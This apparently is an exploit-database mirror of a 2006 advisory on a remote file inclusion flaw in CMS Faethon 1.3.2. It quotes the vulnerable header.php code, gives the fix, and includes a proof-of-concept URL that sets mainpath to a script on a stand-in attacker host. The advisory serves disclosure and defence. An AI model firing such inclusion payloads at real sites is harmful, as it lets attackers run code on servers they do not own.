Advertisement






CMS Faethon 1.3.2 mainpath Remote File Inclusion

CVE Category Price Severity
CVE-2007-6551 CWE-434 N/A Critical
Author Risk Exploitation Type Date
Cyb3r-1st High Remote 2006-06-29
CPE
cpe:cpe:/a:cms:faethon:1.3.2
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 0.070292 0.712286

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006060132

Below is a copy:

____________________   ___ ___ ________

_   _____/_   ___  /   |   \_____  

|    __)_ /      //    ~    /   |   

|        \     ___    Y    /    |    /_______  / ______  /___|_  /_______  /

/         /       /         /

.OR.ID

ECHO_ADV_33$2006

------------------------------------------------------------------------
---

[ECHO_ADV_33$2006] CMS Faethon 1.3.2 mainpath Remote File Inclusion

------------------------------------------------------------------------
---

Author       : M.Hasran Addahroni a.k.a K-159

Date         : June, 16th 2006

Location     : Indonesia, Bali

Web          : http://advisories.echo.or.id/adv/adv33-K-159-2006.txt

Critical Lvl : Highly critical

Impact       : System access

Where        : From Remote

------------------------------------------------------------------------
---

Affected software description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

CMS Faethon

Application : CMS Faethon

version     : 1.3.2

URL         : http://cmsfaethon.com/

Description :

CMS Faethon is content management system for different web pages.

------------------------------------------------------------------------
---

Vulnerability:

~~~~~~~~~~~~~~~~

in folder data we found vulnerability script header.php.

-----------------------header.php----------------------

....

<?php

include($mainpath . 'survey.php');

?>

<h2>RSS - cmsfaethon.com</h2>

<div class="rss-menu">

<?php

$source = 'http://cmsfaethon.com/feed/articles/rss2.php?LangSet=cs';

include($mainpath . 'rss-reader.php');

?>

...

----------------------------------------------------------

Variables $mainpath are not properly sanitized.When register_globals=on and allow_fopenurl=on an attacker can exploit this vulnerability with a simple php injection script.

Proof Of Concept:

~~~~~~~~~~~~~~~~~

http://target.com/[cms_faethon_path]/data/header.php?mainpath=http://att
acker.com/evil.txt?

Solution:

~~~~~~~~~

sanitize variabel $mainpath in header.php

------------------------------------------------------------------------
---

Shoutz:

~~~~~~~

~ ping - my dearest wife, for all the luv the tears n the breath

~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous,kaiten

~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,an0maly,fleanux,bayl
aw

~ sinChan,x`shell,tety,sakitjiwa, m_beben, rizal, cR4SH3R, metalsploit

~ newbie_hacker (at) yahoogroups (dot) com [email concealed]

~ #aikmel #e-c-h-o @irc.dal.net

------------------------------------------------------------------------
---

Contact:

~~~~~~~~

K-159 || echo|staff || eufrato[at]gmail[dot]com

Homepage: http://k-159.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum